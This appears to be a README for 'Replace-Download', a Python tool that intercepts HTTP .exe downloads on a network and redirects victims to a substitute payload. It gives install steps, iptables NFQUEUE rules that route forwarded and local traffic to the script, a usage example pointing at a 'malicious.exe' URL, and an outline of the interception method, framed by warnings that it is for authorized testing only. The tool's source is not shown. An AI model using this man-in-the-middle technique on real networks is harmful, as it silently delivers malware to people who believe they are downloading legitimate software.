Replace-Download is a Python tool designed to intercept HTTP .exe download requests on a network and replace them with a custom payload. This can be useful for penetration testing and red team exercises.
⚠️ Warning: Use this tool only in environments where you have explicit permission. Unauthorized use on public or private networks is illegal.
- Detect outgoing
.exedownload requests. - Redirect download requests to a custom payload URL.
- Prevent infinite loops by ignoring requests to your own payload.
- Simple setup using
netfilterqueueandscapy.
- Python 3.x
- Linux system (tested on Ubuntu/Debian)
scapyPython librarynetfilterqueuePython library
pip3 install scapy netfilterqueueYou also need to set up iptables rules to forward packets to the netfilter queue:
sudo iptables -I FORWARD -j NFQUEUE --queue-num 0
sudo iptables -I OUTPUT -j NFQUEUE --queue-num 0
sudo iptables -I INPUT -j NFQUEUE --queue-num 0python run.py -u <payload_url>
python3 run.py -u http://192.168.1.100/malicious.exe
-u or --url: The full URL to the payload .exe file that will replace detected downloads.
-
The script listens to all HTTP traffic using a netfilter queue.
-
When a .exe download request is detected, the TCP ACK is stored.
-
When the server responds, the script replaces the original payload with a redirect to the custom .exe payload.
-
Checks are in place to prevent replacing your own payload multiple times.
After finishing, remove the iptables rules to restore normal traffic:
sudo iptables -FThis tool is intended only for educational purposes and authorized security testing. Misuse may result in legal consequences.